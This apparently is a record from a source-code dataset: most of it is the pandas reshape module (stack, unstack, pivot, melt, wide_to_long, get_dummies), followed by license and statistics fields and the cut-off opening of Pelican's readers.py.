get_result(self): # TODO: find a better way than this masking business values, value_mask = self.get_new_values() columns = self.get_new_columns() index = self.get_new_index() # filter out missing levels if values.shape[1] > 0: col_inds, obs_ids = compress_group_index(self.sorted_labels[-1]) # rare case, level values not observed if len(obs_ids) < self.full_shape[1]: inds = (value_mask.sum(0) > 0).nonzero()[0] values = algos.take_nd(values, inds, axis=1) columns = columns[inds] # may need to coerce categoricals here if self.is_categorical is not None: categories = self.is_categorical.categories ordered = self.is_categorical.ordered values = [Categorical(values[:, i], categories=categories, ordered=ordered) for i in range(values.shape[-1])] return DataFrame(values, index=index, columns=columns) def get_new_values(self): values = self.values # place the values length, width = self.full_shape stride = values.shape[1] result_width = width * stride result_shape = (length, result_width) mask = self.mask mask_all = mask.all() # we can simply reshape if we don't have a mask if mask_all and len(values): new_values = (self.sorted_values .reshape(length, width, stride) .swapaxes(1, 2) .reshape(result_shape) ) new_mask = np.ones(result_shape, dtype=bool) return new_values, new_mask # if our mask is all True, then we can use our existing dtype if mask_all: dtype = values.dtype new_values = np.empty(result_shape, dtype=dtype) else: dtype, fill_value = maybe_promote(values.dtype, self.fill_value) new_values = np.empty(result_shape, dtype=dtype) new_values.fill(fill_value) new_mask = np.zeros(result_shape, dtype=bool) name = np.dtype(dtype).name sorted_values = self.sorted_values # we need to convert to a basic dtype # and 
possibly coerce an input to our output dtype # e.g. ints -> floats if needs_i8_conversion(values): sorted_values = sorted_values.view('i8') new_values = new_values.view('i8') name = 'int64' elif is_bool_dtype(values): sorted_values = sorted_values.astype('object') new_values = new_values.astype('object') name = 'object' else: sorted_values = sorted_values.astype(name, copy=False) # fill in our values & mask f = getattr(_reshape, "unstack_{}".format(name)) f(sorted_values, mask.view('u1'), stride, length, width, new_values, new_mask.view('u1')) # reconstruct dtype if needed if needs_i8_conversion(values): new_values = new_values.view(values.dtype) return new_values, new_mask def get_new_columns(self): if self.value_columns is None: if self.lift == 0: return self.removed_level lev = self.removed_level return lev.insert(0, _get_na_value(lev.dtype.type)) stride = len(self.removed_level) + self.lift width = len(self.value_columns) propagator = np.repeat(np.arange(width), stride) if isinstance(self.value_columns, MultiIndex): new_levels = self.value_columns.levels + (self.removed_level,) new_names = self.value_columns.names + (self.removed_name,) new_labels = [lab.take(propagator) for lab in self.value_columns.labels] else: new_levels = [self.value_columns, self.removed_level] new_names = [self.value_columns.name, self.removed_name] new_labels = [propagator] new_labels.append(np.tile(np.arange(stride) - self.lift, width)) return MultiIndex(levels=new_levels, labels=new_labels, names=new_names, verify_integrity=False) def get_new_index(self): result_labels = [lab.take(self.compressor) for lab in self.sorted_labels[:-1]] # construct the new index if len(self.new_index_levels) == 1: lev, lab = self.new_index_levels[0], result_labels[0] if (lab == -1).any(): lev = lev.insert(len(lev), _get_na_value(lev.dtype.type)) return lev.take(lab) return MultiIndex(levels=self.new_index_levels, labels=result_labels, names=self.new_index_names, verify_integrity=False) def _unstack_multiple(data, clocs): if len(clocs) == 0: return data # NOTE: This doesn't deal with hierarchical columns yet index = data.index clocs = [index._get_level_number(i) for i in clocs] rlocs = [i for i in range(index.nlevels) if i not in clocs] clevels = [index.levels[i] for i in clocs] clabels = [index.labels[i] for i in clocs] cnames = [index.names[i] for i in clocs] rlevels = [index.levels[i] for i in rlocs] rlabels = [index.labels[i] for i in rlocs] rnames = [index.names[i] for i in rlocs] shape = [len(x) for x in clevels] group_index = get_group_index(clabels, shape, sort=False, xnull=False) comp_ids, obs_ids = compress_group_index(group_index, sort=False) recons_labels = decons_obs_group_ids(comp_ids, obs_ids, shape, clabels, xnull=False) dummy_index = MultiIndex(levels=rlevels + [obs_ids], labels=rlabels + [comp_ids], names=rnames + ['__placeholder__'], verify_integrity=False) if isinstance(data, Series): dummy = data.copy() dummy.index = dummy_index unstacked = dummy.unstack('__placeholder__') new_levels = clevels new_names = cnames new_labels = recons_labels else: if isinstance(data.columns, MultiIndex): result = data for i in range(len(clocs)): val = clocs[i] result = result.unstack(val) clocs = [v if i > v else v - 1 for v in clocs] return result dummy = data.copy() dummy.index = dummy_index unstacked = dummy.unstack('__placeholder__') if isinstance(unstacked, Series): unstcols = unstacked.index else: unstcols = unstacked.columns new_levels = [unstcols.levels[0]] + clevels new_names = [data.columns.name] + cnames new_labels = 
[unstcols.labels[0]] for rec in recons_labels: new_labels.append(rec.take(unstcols.labels[-1])) new_columns = MultiIndex(levels=new_levels, labels=new_labels, names=new_names, verify_integrity=False) if isinstance(unstacked, Series): unstacked.index = new_columns else: unstacked.columns = new_columns return unstacked def pivot(self, index=None, columns=None, values=None): """ See DataFrame.pivot """ if values is None: cols = [columns] if index is None else [index, columns] append = index is None indexed = self.set_index(cols, append=append) return indexed.unstack(columns) else: if index is None: index = self.index else: index = self[index] indexed = Series(self[values].values, index=MultiIndex.from_arrays([index, self[columns]])) return indexed.unstack(columns) def pivot_simple(index, columns, values): """ Produce 'pivot' table based on 3 columns of this DataFrame. Uses unique values from index / columns and fills with values. Parameters ---------- index : ndarray Labels to use to make new frame's index columns : ndarray Labels to use to make new frame's columns values : ndarray Values to use for populating new frame's values Notes ----- Obviously, all 3 of the input arguments must have the same length Returns ------- DataFrame See also -------- DataFrame.pivot_table : generalization of pivot that can handle duplicate values for one index/column pair """ if (len(index) != len(columns)) or (len(columns) != len(values)): raise AssertionError('Length of index, columns, and values must be the' ' same') if len(index) == 0: return DataFrame(index=[]) hindex = MultiIndex.from_arrays([index, columns]) series = Series(values.ravel(), index=hindex) series = series.sort_index(level=0) return series.unstack() def _slow_pivot(index, columns, values): """ Produce 'pivot' table based on 3 columns of this DataFrame. Uses unique values from index / columns and fills with values. Parameters ---------- index : string or object Column name to use to make new frame's index columns : string or object Column name to use to make new frame's columns values : string or object Column name to use for populating new frame's values Could benefit from some Cython here. 
""" tree = {} for i, (idx, col) in enumerate(zip(index, columns)): if col not in tree: tree[col] = {} branch = tree[col] branch[idx] = values[i] return DataFrame(tree) def unstack(obj, level, fill_value=None): if isinstance(level, (tuple, list)): return _unstack_multiple(obj, level) if isinstance(obj, DataFrame): if isinstance(obj.index, MultiIndex): return _unstack_frame(obj, level, fill_value=fill_value) else: return obj.T.stack(dropna=False) else: unstacker = _Unstacker(obj.values, obj.index, level=level, fill_value=fill_value) return unstacker.get_result() def _unstack_frame(obj, level, fill_value=None): from pandas.core.internals import BlockManager, make_block if obj._is_mixed_type: unstacker = _Unstacker(np.empty(obj.shape, dtype=bool), # dummy obj.index, level=level, value_columns=obj.columns) new_columns = unstacker.get_new_columns() new_index = unstacker.get_new_index() new_axes = [new_columns, new_index] new_blocks = [] mask_blocks = [] for blk in obj._data.blocks: blk_items = obj._data.items[blk.mgr_locs.indexer] bunstacker = _Unstacker(blk.values.T, obj.index, level=level, value_columns=blk_items, fill_value=fill_value) new_items = bunstacker.get_new_columns() new_placement = new_columns.get_indexer(new_items) new_values, mask = bunstacker.get_new_values() mblk = make_block(mask.T, placement=new_placement) mask_blocks.append(mblk) newb = make_block(new_values.T, placement=new_placement) new_blocks.append(newb) result = DataFrame(BlockManager(new_blocks, new_axes)) mask_frame = DataFrame(BlockManager(mask_blocks, new_axes)) return result.loc[:, mask_frame.sum(0) > 0] else: unstacker = _Unstacker(obj.values, obj.index, level=level, value_columns=obj.columns, fill_value=fill_value) return unstacker.get_result() def stack(frame, level=-1, dropna=True): """ Convert DataFrame to Series with multi-level Index. Columns become the second level of the resulting hierarchical index Returns ------- stacked : Series """ def factorize(index): if index.is_unique: return index, np.arange(len(index)) codes, categories = _factorize_from_iterable(index) return categories, codes N, K = frame.shape if isinstance(frame.columns, MultiIndex): if frame.columns._reference_duplicate_name(level): msg = ("Ambiguous reference to {0}. The column " "names are not unique.".format(level)) raise ValueError(msg) # Will also convert negative level numbers and check if out of bounds. 
level_num = frame.columns._get_level_number(level) if isinstance(frame.columns, MultiIndex): return _stack_multi_columns(frame, level_num=level_num, dropna=dropna) elif isinstance(frame.index, MultiIndex): new_levels = list(frame.index.levels) new_labels = [lab.repeat(K) for lab in frame.index.labels] clev, clab = factorize(frame.columns) new_levels.append(clev) new_labels.append(np.tile(clab, N).ravel()) new_names = list(frame.index.names) new_names.append(frame.columns.name) new_index = MultiIndex(levels=new_levels, labels=new_labels, names=new_names, verify_integrity=False) else: levels, (ilab, clab) = zip(*map(factorize, (frame.index, frame.columns))) labels = ilab.repeat(K), np.tile(clab, N).ravel() new_index = MultiIndex(levels=levels, labels=labels, names=[frame.index.name, frame.columns.name], verify_integrity=False) new_values = frame.values.ravel() if dropna: mask = notna(new_values) new_values = new_values[mask] new_index = new_index[mask] return Series(new_values, index=new_index) def stack_multiple(frame, level, dropna=True): # If all passed levels match up to column names, no # ambiguity about what to do if all(lev in frame.columns.names for lev in level): result = frame for lev in level: result = stack(result, lev, dropna=dropna) # Otherwise, level numbers may change as each successive level is stacked elif all(isinstance(lev, int) for lev in level): # As each stack is done, the level numbers decrease, so we need # to account for that when level is a sequence of ints result = frame # _get_level_number() checks level numbers are in range and converts # negative numbers to positive level = [frame.columns._get_level_number(lev) for lev in level] # Can't iterate directly through level as we might need to change # values as we go for index in range(len(level)): lev = level[index] result = stack(result, lev, dropna=dropna) # Decrement all level numbers greater than current, as these # have now shifted down by one updated_level = [] for other in level: if other > lev: updated_level.append(other - 1) else: updated_level.append(other) level = updated_level else: raise ValueError("level should contain all level names or all level " "numbers, not a mixture of the two.") return result def _stack_multi_columns(frame, level_num=-1, dropna=True): def _convert_level_number(level_num, columns): """ Logic for converting the level number to something we can safely pass to swaplevel: We generally want to convert the level number into a level name, except when columns do not have names, in which case we must leave as a level number """ if level_num in columns.names: return columns.names[level_num] else: if columns.names[level_num] is None: return level_num else: return columns.names[level_num] this = frame.copy() # this makes life much simpler if level_num != frame.columns.nlevels - 1: # roll levels to put selected level at end roll_columns = this.columns for i in range(level_num, frame.columns.nlevels - 1): # Need to check if the ints conflict with level names lev1 = _convert_level_number(i, roll_columns) lev2 = _convert_level_number(i + 1, roll_columns) roll_columns = roll_columns.swaplevel(lev1, lev2) this.columns = roll_columns if not this.columns.is_lexsorted(): # Workaround the edge case where 0 is one of the column names, # which interferes with trying to sort based on the first # level level_to_sort = _convert_level_number(0, this.columns) this = this.sort_index(level=level_to_sort, axis=1) # tuple list excluding level for grouping columns if len(frame.columns.levels) > 2: tuples = 
list(zip(*[lev.take(lab) for lev, lab in zip(this.columns.levels[:-1], this.columns.labels[:-1])])) unique_groups = [key for key, _ in itertools.groupby(tuples)] new_names = this.columns.names[:-1] new_columns = MultiIndex.from_tuples(unique_groups, names=new_names) else: new_columns = unique_groups = this.columns.levels[0] # time to ravel the values new_data = {} level_vals = this.columns.levels[-1] level_labels = sorted(set(this.columns.labels[-1])) level_vals_used = level_vals[level_labels] levsize = len(level_labels) drop_cols = [] for key in unique_groups: loc = this.columns.get_loc(key) # can make more efficient? # we almost always return a slice # but if unsorted can get a boolean # indexer if not isinstance(loc, slice): slice_len = len(loc) else: slice_len = loc.stop - loc.start if slice_len == 0: drop_cols.append(key) continue elif slice_len != levsize: chunk = this.loc[:, this.columns[loc]] chunk.columns = level_vals.take(chunk.columns.labels[-1]) value_slice = chunk.reindex(columns=level_vals_used).values else: if frame._is_mixed_type: value_slice = this.loc[:, this.columns[loc]].values else: value_slice = this.values[:, loc] new_data[key] = value_slice.ravel() if len(drop_cols) > 0: new_columns = new_columns.difference(drop_cols) N = len(this) if isinstance(this.index, MultiIndex): new_levels = list(this.index.levels) new_names = list(this.index.names) new_labels = [lab.repeat(levsize) for lab in this.index.labels] else: new_levels = [this.index] new_labels = [np.arange(N).repeat(levsize)] new_names = [this.index.name] # something better? new_levels.append(level_vals) new_labels.append(np.tile(level_labels, N)) new_names.append(frame.columns.names[level_num]) new_index = MultiIndex(levels=new_levels, labels=new_labels, names=new_names, verify_integrity=False) result = DataFrame(new_data, index=new_index, columns=new_columns) # more efficient way to go about this? can do the whole masking biz but # will only save a small amount of time... if dropna: result = result.dropna(axis=0, how='all') return result @Appender(_shared_docs['melt'] % dict(caller='pd.melt(df, ', versionadded="", other='DataFrame.melt')) def melt(frame, id_vars=None, value_vars=None, var_name=None, value_name='value', col_level=None): # TODO: what about the existing index? if id_vars is not None: if not is_list_like(id_vars): id_vars = [id_vars] elif (isinstance(frame.columns, MultiIndex) and not isinstance(id_vars, list)): raise ValueError('id_vars must be a list of tuples when columns' ' are a MultiIndex') else: id_vars = list(id_vars) else: id_vars = [] if value_vars is not None: if not is_list_like(value_vars): value_vars = [value_vars] elif (isinstance(frame.columns, MultiIndex) and not isinstance(value_vars, list)): raise ValueError('value_vars must be a list of tuples when' ' columns are a MultiIndex') else: value_vars = list(value_vars) frame = frame.loc[:, id_vars + value_vars] else: frame = frame.copy() if col_level is not None: # allow list or other? 
# frame is a copy frame.columns = frame.columns.get_level_values(col_level) if var_name is None: if isinstance(frame.columns, MultiIndex): if len(frame.columns.names) == len(set(frame.columns.names)): var_name = frame.columns.names else: var_name = ['variable_%s' % i for i in range(len(frame.columns.names))] else: var_name = [frame.columns.name if frame.columns.name is not None else 'variable'] if isinstance(var_name, compat.string_types): var_name = [var_name] N, K = frame.shape K -= len(id_vars) mdata = {} for col in id_vars: mdata[col] = np.tile(frame.pop(col).values, K) mcolumns = id_vars + var_name + [value_name] mdata[value_name] = frame.values.ravel('F') for i, col in enumerate(var_name): # asanyarray will keep the columns as an Index mdata[col] = np.asanyarray(frame.columns ._get_level_values(i)).repeat(N) return DataFrame(mdata, columns=mcolumns) def lreshape(data, groups, dropna=True, label=None): """ Reshape long-format data to wide. Generalized inverse of DataFrame.pivot Parameters ---------- data : DataFrame groups : dict {new_name : list_of_columns} dropna : boolean, default True Examples -------- >>> import pandas as pd >>> data = pd.DataFrame({'hr1': [514, 573], 'hr2': [545, 526], ... 'team': ['Red Sox', 'Yankees'], ... 'year1': [2007, 2007], 'year2': [2008, 2008]}) >>> data hr1 hr2 team year1 year2 0 514 545 Red Sox 2007 2008 1 573 526 Yankees 2007 2008 >>> pd.lreshape(data, {'year': ['year1', 'year2'], 'hr': ['hr1', 'hr2']}) team year hr 0 Red Sox 2007 514 1 Yankees 2007 573 2 Red Sox 2008 545 3 Yankees 2008 526 Returns ------- reshaped : DataFrame """ if isinstance(groups, dict): keys = list(groups.keys()) values = list(groups.values()) else: keys, values = zip(*groups) all_cols = list(set.union(*[set(x) for x in values])) id_cols = list(data.columns.difference(all_cols)) K = len(values[0]) for seq in values: if len(seq) != K: raise ValueError('All column lists must be same length') mdata = {} pivot_cols = [] for target, names in zip(keys, values): to_concat = [data[col].values for col in names] mdata[target] = _concat._concat_compat(to_concat) pivot_cols.append(target) for col in id_cols: mdata[col] = np.tile(data[col].values, K) if dropna: mask = np.ones(len(mdata[pivot_cols[0]]), dtype=bool) for c in pivot_cols: mask &= notna(mdata[c]) if not mask.all(): mdata = dict((k, v[mask]) for k, v in compat.iteritems(mdata)) return DataFrame(mdata, columns=id_cols + pivot_cols) def wide_to_long(df, stubnames, i, j, sep="", suffix='\d+'): r""" Wide panel to long format. Less flexible but more user-friendly than melt. With stubnames ['A', 'B'], this function expects to find one or more group of columns with format Asuffix1, Asuffix2,..., Bsuffix1, Bsuffix2,... You specify what you want to call this suffix in the resulting long format with `j` (for example `j='year'`) Each row of these wide variables are assumed to be uniquely identified by `i` (can be a single column name or a list of column names) All remaining variables in the data frame are left intact. Parameters ---------- df : DataFrame The wide-format DataFrame stubnames : str or list-like The stub name(s). The wide format variables are assumed to start with the stub names. i : str or list-like Column(s) to use as id variable(s) j : str The name of the subobservation variable. What you wish to name your suffix in the long format. sep : str, default "" A character indicating the separation of the variable names in the wide format, to be stripped from the names in the long format. 
For example, if your column names are A-suffix1, A-suffix2, you can strip the hypen by specifying `sep='-'` .. versionadded:: 0.20.0 suffix : str, default '\\d+' A regular expression capturing the wanted suffixes. '\\d+' captures numeric suffixes. Suffixes with no numbers could be specified with the negated character class '\\D+'. You can also further disambiguate suffixes, for example, if your wide variables are of the form Aone, Btwo,.., and you have an unrelated column Arating, you can ignore the last one by specifying `suffix='(!?one|two)'` .. versionadded:: 0.20.0 Returns ------- DataFrame A DataFrame that contains each stub name as a variable, with new index (i, j) Examples -------- >>> import pandas as pd >>> import numpy as np >>> np.random.seed(123) >>> df = pd.DataFrame({"A1970" : {0 : "a", 1 : "b", 2 : "c"}, ... "A1980" : {0 : "d", 1 : "e", 2 : "f"}, ... "B1970" : {0 : 2.5, 1 : 1.2, 2 : .7}, ... "B1980" : {0 : 3.2, 1 : 1.3, 2 : .1}, ... "X" : dict(zip(range(3), np.random.randn(3))) ... }) >>> df["id"] = df.index >>> df A1970 A1980 B1970 B1980 X id 0 a d 2.5 3.2 -1.085631 0 1 b e 1.2 1.3 0.997345 1 2 c f 0.7 0.1 0.282978 2 >>> pd.wide_to_long(df, ["A", "B"], i="id", j="year") ... # doctest: +NORMALIZE_WHITESPACE X A B id year 0 1970 -1.085631 a 2.5 1 1970 0.997345 b 1.2 2 1970 0.282978 c 0.7 0 1980 -1.085631 d 3.2 1 1980 0.997345 e 1.3 2 1980 0.282978 f 0.1 With multuple id columns >>> df = pd.DataFrame({ ... 'famid': [1, 1, 1, 2, 2, 2, 3, 3, 3], ... 'birth': [1, 2, 3, 1, 2, 3, 1, 2, 3], ... 'ht1': [2.8, 2.9, 2.2, 2, 1.8, 1.9, 2.2, 2.3, 2.1], ... 'ht2': [3.4, 3.8, 2.9, 3.2, 2.8, 2.4, 3.3, 3.4, 2.9] ... }) >>> df birth famid ht1 ht2 0 1 1 2.8 3.4 1 2 1 2.9 3.8 2 3 1 2.2 2.9 3 1 2 2.0 3.2 4 2 2 1.8 2.8 5 3 2 1.9 2.4 6 1 3 2.2 3.3 7 2 3 2.3 3.4 8 3 3 2.1 2.9 >>> l = pd.wide_to_long(df, stubnames='ht', i=['famid', 'birth'], j='age') >>> l ... # doctest: +NORMALIZE_WHITESPACE ht famid birth age 1 1 1 2.8 2 3.4 2 1 2.9 2 3.8 3 1 2.2 2 2.9 2 1 1 2.0 2 3.2 2 1 1.8 2 2.8 3 1 1.9 2 2.4 3 1 1 2.2 2 3.3 2 1 2.3 2 3.4 3 1 2.1 2 2.9 Going from long back to wide just takes some creative use of `unstack` >>> w = l.reset_index().set_index(['famid', 'birth', 'age']).unstack() >>> w.columns = pd.Index(w.columns).str.join('') >>> w.reset_index() famid birth ht1 ht2 0 1 1 2.8 3.4 1 1 2 2.9 3.8 2 1 3 2.2 2.9 3 2 1 2.0 3.2 4 2 2 1.8 2.8 5 2 3 1.9 2.4 6 3 1 2.2 3.3 7 3 2 2.3 3.4 8 3 3 2.1 2.9 Less wieldy column names are also handled >>> np.random.seed(0) >>> df = pd.DataFrame({'A(quarterly)-2010': np.random.rand(3), ... 'A(quarterly)-2011': np.random.rand(3), ... 'B(quarterly)-2010': np.random.rand(3), ... 'B(quarterly)-2011': np.random.rand(3), ... 'X' : np.random.randint(3, size=3)}) >>> df['id'] = df.index >>> df # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS A(quarterly)-2010 A(quarterly)-2011 B(quarterly)-2010 ... 0 0.548814 0.544883 0.437587 ... 1 0.715189 0.423655 0.891773 ... 2 0.602763 0.645894 0.963663 ... X id 0 0 0 1 1 1 2 1 2 >>> pd.wide_to_long(df, ['A(quarterly)', 'B(quarterly)'], i='id', ... j='year', sep='-') ... # doctest: +NORMALIZE_WHITESPACE X A(quarterly) B(quarterly) id year 0 2010 0 0.548814 0.437587 1 2010 1 0.715189 0.891773 2 2010 1 0.602763 0.963663 0 2011 0 0.544883 0.383442 1 2011 1 0.423655 0.791725 2 2011 1 0.645894 0.528895 If we have many columns, we could also use a regex to find our stubnames and pass that list on to wide_to_long >>> stubnames = sorted( ... set([match[0] for match in df.columns.str.findall( ... r'[A-B]\(.*\)').values if match != [] ]) ... 
) >>> list(stubnames) ['A(quarterly)', 'B(quarterly)'] Notes ----- All extra variables are left untouched. This simply uses `pandas.melt` under the hood, but is hard-coded to "do the right thing" in a typicaly case. """ def get_var_names(df, stub, sep, suffix): regex = "^{0}{1}{2}".format(re.escape(stub), re.escape(sep), suffix) return df.filter(regex=regex).columns.tolist() def melt_stub(df, stub, i, j, value_vars, sep): newdf = melt(df, id_vars=i, value_vars=value_vars, value_name=stub.rstrip(sep), var_name=j) newdf[j] = Categorical(newdf[j]) newdf[j] = newdf[j].str.replace(re.escape(stub + sep), "") return newdf.set_index(i + [j]) if any(map(lambda s: s in df.columns.tolist(), stubnames)): raise ValueError("stubname can't be identical to a column name") if not is_list_like(stubnames): stubnames = [stubnames] else: stubnames = list(stubnames) if not is_list_like(i): i = [i] else: i = list(i) if df[i].duplicated().any(): raise ValueError("the id variables need to uniquely identify each row") value_vars = list(map(lambda stub: get_var_names(df, stub, sep, suffix), stubnames)) value_vars_flattened = [e for sublist in value_vars for e in sublist] id_vars = list(set(df.columns.tolist()).difference(value_vars_flattened)) melted = [] for s, v in zip(stubnames, value_vars): melted.append(melt_stub(df, s, i, j, v, sep)) melted = melted[0].join(melted[1:], how='outer') if len(i) == 1: new = df[id_vars].set_index(i).join(melted) return new new = df[id_vars].merge(melted.reset_index(), on=i).set_index(i + [j]) return new def get_dummies(data, prefix=None, prefix_sep='_', dummy_na=False, columns=None, sparse=False, drop_first=False): """ Convert categorical variable into dummy/indicator variables Parameters ---------- data : array-like, Series, or DataFrame prefix : string, list of strings, or dict of strings, default None String to append DataFrame column names Pass a list with length equal to the number of columns when calling get_dummies on a DataFrame. Alternativly, `prefix` can be a dictionary mapping column names to prefixes. prefix_sep : string, default '_' If appending prefix, separator/delimiter to use. Or pass a list or dictionary as with `prefix.` dummy_na : bool, default False Add a column to indicate NaNs, if False NaNs are ignored. columns : list-like, default None Column names in the DataFrame to be encoded. If `columns` is None then all the columns with `object` or `category` dtype will be converted. sparse : bool, default False Whether the dummy columns should be sparse or not. Returns SparseDataFrame if `data` is a Series or if all columns are included. Otherwise returns a DataFrame with some SparseBlocks. .. versionadded:: 0.16.1 drop_first : bool, default False Whether to get k-1 dummies out of k categorical levels by removing the first level. .. versionadded:: 0.18.0 Returns ------- dummies : DataFrame or SparseDataFrame Examples -------- >>> import pandas as pd >>> s = pd.Series(list('abca')) >>> pd.get_dummies(s) a b c 0 1 0 0 1 0 1 0 2 0 0 1 3 1 0 0 >>> s1 = ['a', 'b', np.nan] >>> pd.get_dummies(s1) a b 0 1 0 1 0 1 2 0 0 >>> pd.get_dummies(s1, dummy_na=True) a b NaN 0 1 0 0 1 0 1 0 2 0 0 1 >>> df = pd.DataFrame({'A': ['a', 'b', 'a'], 'B': ['b', 'a', 'c'], ... 
'C': [1, 2, 3]}) >>> pd.get_dummies(df, prefix=['col1', 'col2']) C col1_a col1_b col2_a col2_b col2_c 0 1 1 0 0 1 0 1 2 0 1 1 0 0 2 3 1 0 0 0 1 >>> pd.get_dummies(pd.Series(list('abcaa'))) a b c 0 1 0 0 1 0 1 0 2 0 0 1 3 1 0 0 4 1 0 0 >>> pd.get_dummies(pd.Series(list('abcaa')), drop_first=True) b c 0 0 0 1 1 0 2 0 1 3 0 0 4 0 0 See Also -------- Series.str.get_dummies """ from pandas.core.reshape.concat import concat from itertools import cycle if isinstance(data, DataFrame): # determine columns being encoded if columns is None: columns_to_encode = data.select_dtypes( include=['object', 'category']).columns else: columns_to_encode = columns # validate prefixes and separator to avoid silently dropping cols def check_len(item, name): length_msg = ("Length of '{0}' ({1}) did not match the length of " "the columns being encoded ({2}).") if is_list_like(item): if not len(item) == len(columns_to_encode): raise ValueError(length_msg.format(name, len(item), len(columns_to_encode))) check_len(prefix, 'prefix') check_len(prefix_sep, 'prefix_sep') if isinstance(prefix, compat.string_types): prefix = cycle([prefix]) if isinstance(prefix, dict): prefix = [prefix[col] for col in columns_to_encode] if prefix is None: prefix = columns_to_encode # validate separators if isinstance(prefix_sep, compat.string_types): prefix_sep = cycle([prefix_sep]) elif isinstance(prefix_sep, dict): prefix_sep = [prefix_sep[col] for col in columns_to_encode] if set(columns_to_encode) == set(data.columns): with_dummies = [] else: with_dummies = [data.drop(columns_to_encode, axis=1)] for (col, pre, sep) in zip(columns_to_encode, prefix, prefix_sep): dummy = _get_dummies_1d(data[col], prefix=pre, prefix_sep=sep, dummy_na=dummy_na, sparse=sparse, drop_first=drop_first) with_dummies.append(dummy) result = concat(with_dummies, axis=1) else: result = _get_dummies_1d(data, prefix, prefix_sep, dummy_na, sparse=sparse, drop_first=drop_first) return result def _get_dummies_1d(data, prefix, prefix_sep='_', dummy_na=False, sparse=False, drop_first=False): # Series avoids inconsistent NaN handling codes, levels = _factorize_from_iterable(Series(data)) def get_empty_Frame(data, sparse): if isinstance(data, Series): index = data.index else: index = np.arange(len(data)) if not sparse: return DataFrame(index=index) else: return SparseDataFrame(index=index, default_fill_value=0) # if all NaN if not dummy_na and len(levels) == 0: return get_empty_Frame(data, sparse) codes = codes.copy() if dummy_na: codes[codes == -1] = len(levels) levels = np.append(levels, np.nan) # if dummy_na, we just fake a nan level. 
drop_first will drop it again if drop_first and len(levels) == 1: return get_empty_Frame(data, sparse) number_of_cols = len(levels) if prefix is not None: dummy_cols = ['%s%s%s' % (prefix, prefix_sep, v) for v in levels] else: dummy_cols = levels if isinstance(data, Series): index = data.index else: index = None if sparse: sparse_series = {} N = len(data) sp_indices = [[] for _ in range(len(dummy_cols))] for ndx, code in enumerate(codes): if code == -1: # Blank entries if not dummy_na and code == -1, #GH4446 continue sp_indices[code].append(ndx) if drop_first: # remove first categorical level to avoid perfect collinearity # GH12042 sp_indices = sp_indices[1:] dummy_cols = dummy_cols[1:] for col, ixs in zip(dummy_cols, sp_indices): sarr = SparseArray(np.ones(len(ixs), dtype=np.uint8), sparse_index=IntIndex(N, ixs), fill_value=0, dtype=np.uint8) sparse_series[col] = SparseSeries(data=sarr, index=index) out = SparseDataFrame(sparse_series, index=index, columns=dummy_cols, default_fill_value=0, dtype=np.uint8) return out else: dummy_mat = np.eye(number_of_cols, dtype=np.uint8).take(codes, axis=0) if not dummy_na: # reset NaN GH4446 dummy_mat[codes == -1] = 0 if drop_first: # remove first GH12042 dummy_mat = dummy_mat[:, 1:] dummy_cols = dummy_cols[1:] return DataFrame(dummy_mat, index=index, columns=dummy_cols) def make_axis_dummies(frame, axis='minor', transform=None): """ Construct 1-0 dummy variables corresponding to designated axis labels Parameters ---------- frame : DataFrame axis : {'major', 'minor'}, default 'minor' transform : function, default None Function to apply to axis labels first. For example, to get "day of week" dummies in a time series regression you might call:: make_axis_dummies(panel, axis='major', transform=lambda d: d.weekday()) Returns ------- dummies : DataFrame Column names taken from chosen axis """ numbers = {'major': 0, 'minor': 1} num = numbers.get(axis, axis) items = frame.index.levels[num] labels = frame.index.labels[num] if transform is not None: mapped_items = items.map(transform) labels, items = _factorize_from_iterable(mapped_items.take(labels)) values = np.eye(len(items), dtype=float) values = values.take(labels, axis=0) return DataFrame(values, columns=items, index=frame.index)
gpl-2.0
8,329,274,033,396,292,000
33.239163
79
0.56005
false
3.675546
false
false
false
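A short round trip through the public entry points implemented by the reshape module above (stack/unstack, which are backed by _Unstacker, and get_dummies). The frame below is invented purely for illustration and uses only calls that appear in this record's code.

# Toy data exercising the module's public surface.
import numpy as np
import pandas as pd

df = pd.DataFrame(
    np.arange(6).reshape(2, 3),
    index=["one", "two"],
    columns=["a", "b", "c"],
)

stacked = df.stack()          # DataFrame -> Series with a two-level MultiIndex
restored = stacked.unstack()  # and back again
print(restored.equals(df))    # the round trip is lossless for this frame

dummies = pd.get_dummies(pd.Series(list("abca")), drop_first=True)
print(dummies)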
zackw/pelican
pelican/readers.py
1
25554
# -*- coding: utf-8 -*- from __future__ import print_function, unicode_literals import logging import os import re from collections import OrderedDict import docutils import docutils.core import docutils.io from docutils.writers.html4css1 import HTMLTranslator, Writer import six from six.moves.html_parser import HTMLParser from pelican import rstdirectives # NOQA from pelican import signals from pelican.cache import FileStampDataCacher from pelican.contents import Author, Category, Page, Tag from pelican.utils import SafeDatetime, escape_html, get_date, pelican_open, \ posixize_path try: from markdown import Markdown except ImportError: Markdown = False # NOQA # Metadata processors have no way to discard an unwanted value, so we have # them return this value instead to signal that it should be discarded later. # This means that _filter_discardable_metadata() must be called on processed # metadata dicts before use, to remove the items with the special value. _DISCARD = object() METADATA_PROCESSORS = { 'tags': lambda x, y: ([ Tag(tag, y) for tag in ensure_metadata_list(x) ] or _DISCARD), 'date': lambda x, y: get_date(x.replace('_', ' ')), 'modified': lambda x, y: get_date(x), 'status': lambda x, y: x.strip() or _DISCARD, 'category': lambda x, y: _process_if_nonempty(Category, x, y), 'author': lambda x, y: _process_if_nonempty(Author, x, y), 'authors': lambda x, y: ([ Author(author, y) for author in ensure_metadata_list(x) ] or _DISCARD), 'slug': lambda x, y: x.strip() or _DISCARD, } logger = logging.getLogger(__name__) def ensure_metadata_list(text): """Canonicalize the format of a list of authors or tags. This works the same way as Docutils' "authors" field: if it's already a list, those boundaries are preserved; otherwise, it must be a string; if the string contains semicolons, it is split on semicolons; otherwise, it is split on commas. This allows you to write author lists in either "Jane Doe, John Doe" or "Doe, Jane; Doe, John" format. Regardless, all list items undergo .strip() before returning, and empty items are discarded. """ if isinstance(text, six.text_type): if ';' in text: text = text.split(';') else: text = text.split(',') return list(OrderedDict.fromkeys( [v for v in (w.strip() for w in text) if v] )) def _process_if_nonempty(processor, name, settings): """Removes extra whitespace from name and applies a metadata processor. If name is empty or all whitespace, returns _DISCARD instead. """ name = name.strip() return processor(name, settings) if name else _DISCARD def _filter_discardable_metadata(metadata): """Return a copy of a dict, minus any items marked as discardable.""" return {name: val for name, val in metadata.items() if val is not _DISCARD} class BaseReader(object): """Base class to read files. This class is used to process static files, and it can be inherited for other types of file. A Reader class must have the following 